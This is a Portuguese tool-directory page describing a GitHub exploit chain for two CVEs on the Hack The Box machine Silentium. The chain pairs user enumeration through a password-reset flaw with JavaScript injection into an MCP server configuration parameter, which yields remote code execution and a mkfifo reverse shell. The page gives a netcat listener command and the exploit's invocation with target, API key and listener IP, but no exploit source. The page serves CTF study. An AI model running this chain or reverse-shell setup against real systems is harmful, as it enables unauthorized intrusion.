Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-58434-59528-htb-ctf — Exploração Silentium HTB-CTF | Kitploit
Ferramentas/GitHubGitHub/jwsly12/cve-2025-58434-59528-htb-ctf
Geração de PayloadsExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoAprendizado e Educação
GitHubjwsly12/cve-2025-58434-59528-htb-ctf

CVE-2025-58434-59528-htb-ctf

Exploração Silentium HTB-CTF

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
22há 4 mesesAinda não revisado
Compartilhar

CVE-2025-58434-59528-htb-ctf

Cadeia de Exploração Silentium

Este repositório contém a cadeia de exploração completa para a máquina Silentium no Hack The Box. O exploit utiliza uma vulnerabilidade em dois estágios envolvendo enumeração de usuários e injeção de JavaScript para alcançar Execução Remota de Código (RCE).

📝 Descrição

A cadeia de vulnerabilidades consiste em uma falha de divulgação de informações e uma injeção de código crítica. Ao enumerar primeiro os usuários válidos através de um bug de redefinição de senha, obtemos o contexto necessário para atacar o endpoint customMCP. O RCE é alcançado injetando uma função JavaScript maliciosa no parâmetro mcpServerConfig, que é executada pelo backend Node.js.

🛠️ Funcionalidades

  • Enumeração de Usuários: Automatiza a descoberta de e-mails válidos do sistema usando uma wordlist.
  • Injeção de JavaScript: Utiliza uma IIFE (Expressão de Função Imediatamente Invocada) para contornar a sanitização.
  • TCP Reverse Shell: Gera um shell estável usando um pipe mkfifo.
  • Automação de Payload: Lida automaticamente com todas as saídas JSON e autenticação via Bearer Token.

🚀 Requisitos

Você precisa ter Python 3 e Bash instalados, juntamente com a seguinte biblioteca:

pip install requests

💻 Uso

1. Enumerar Usuários

Execute o script de enumeração (Bash) para encontrar contas válidas (requer users.txt):

python3 CVE-2025-58434.py

2. Iniciar seu listener

Na sua máquina local, inicie um listener Netcat:

nc -lvnp 4444

3. Executar o exploit

Execute o script Python fornecendo o alvo, seu IP e a chave de API obtida:

python3 CVE-2025-59528.py -t -k <CHAVE_API> -l <SEU_IP> -p 4444

⚙️ Argumentos

ArgumentoDescriçãoObrigatório
-t, --targetHost alvoSim
-k, --keyToken Bearer da APISim
-l, --lhostSeu IP do listener (VPN)Sim
-p, --lportSua porta do listenerSim

⚠️ Aviso Legal

Este script é destinado a fins educacionais e testes de penetração autorizados apenas em ambientes CTF. Acessar ou atacar alvos sem autorização prévia é ilegal.


Desafio: Silentium (Hack The Box)
CVEs: CVE-2025-58434 | CVE-2025-59528

Baixar ferramenta